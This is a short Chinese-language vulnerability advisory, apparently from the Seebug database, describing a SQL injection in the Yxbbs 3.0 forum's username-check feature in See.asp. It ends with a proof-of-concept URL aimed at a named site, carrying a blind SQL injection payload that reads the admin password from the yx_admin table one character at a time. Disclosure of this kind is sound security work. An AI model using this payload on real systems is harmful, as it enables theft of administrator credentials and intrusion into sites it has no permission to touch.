Yxbbs3.0 注入漏洞

2009-04-01T00:00:00
ID SSV:4966
Type seebug
Reporter Root
Modified 2009-04-01T00:00:00

Description

yxbbs在用户注册时,会实时检测用户名是否已存在以及用户名是否合法,不过服务端在检测时,对用户提交数据检验不够,本来人性化的一个功能,引入了一个注入点。 具体涉及文件See.asp,对用户提交的 name = unescape(Request("name")) 并未做任何检验。

Yxbbs3.0 暂无

                                        
                                            
                                                http://www.yimxu.com/bbs/See.Asp?Action=CheckName&name=yxbbs' and (select top 1 asc(mid(password,1,1)) from yx_admin)>56 and '1'='1